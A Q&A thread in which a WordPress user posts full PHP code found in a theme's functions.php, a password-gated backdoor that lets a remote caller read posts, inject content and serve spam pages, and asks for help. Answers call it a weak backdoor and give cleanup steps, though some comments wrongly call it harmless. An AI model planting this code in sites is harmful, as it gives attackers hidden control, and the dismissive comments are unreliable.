# Weird script inside my WordPress functions file

Tags: php, wordpress

Can anyone explain this script? I found this script when I get back to functions.php file to input some new codes. Some kind of strange scripts that I don't remember I input it. And I found out that there was also a copy in the server where I upload the development site preview. It looks like too late for me to noticed this. I have 2 projects having this type of code inside my function. Was this a hacking procedure slip through my WordPress system?

```
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '730fcc096903854c1aa4f815a7d02b2b'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }
```

If this is possible malicious scripting, anyone do have suggestions to clear or avoid this in the future?

Comment: "how to clear or avoid this"... well, 1. delete the file and 2. stop using wordpress.

Comment: Terrible advice ^

Comment: No - it doesn't look malicious. Note that deleting it may cause a significant problems at some unforeseeable  point

Comment: I agree with Ty Bailey. Arkascha's comment isn't advisable or helpful

Answer (score 1, accepted):

It doesn't look like it should be there, but then again after reviewing the code it doesn't look like it does anything super malicious... Basically if someone enters your url with the parameters `?action=[ACTION]&password=730fcc096903854c1aa4f815a7d02b2b` they will have access to your site to perform one of the actions listed in the `switch()` statement.

It appears to render a full page at the end (including sidebars), then with some modified content from a foreign database table called `[YOUR_PREFIX]_datalist` -- which is not a native WordPress database table.

Very strange if it was indeed part of the original theme development, but to me it looks like some sort of weak backdoor.

Remove the file and go through all of the theme files and make sure you don't see anything else that shouldn't be there. Probably a good idea to run some sort of check on your plugins as well. Make sure they are all up to date and there are no known reported vulnerabilities. Then download a fresh copy of WordPress and replace all of the files except the `wp-content` directory. Make sure to change your settings in the `wp-config.php` file.

After doing this, I would read up on some WP security tips. This article has tons of information on this: https://premium.wpmudev.org/blog/ultimate-wordpress-security-checklist/

I recommend installing a WP Security Plugin as well. I personally prefer [All in One WP Security & Firewall](https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/), but [WordFence](https://www.wordfence.com/) is great as well.

Comment: Thanks for the advice Ty Bailey... I would go for a fresh copy of WP and scan all of my files to see if there's more independent codes injected to my files.. I have Sucuri plugin aside from iThemes. This is literally pain in the a**. Anyway, Thanks again.

Comment: Sucuri should be able to do a full scan of your files and make sure nothing is found there (I think) -- this is just about your only option to securing it again though for sure. Like mentioned in a comment on your original question, make sure you test this as there is a slight change the theme depends on it (doubt it -- but worth a test)

Comment: If this helped you clear things up feel free to accept this answer :)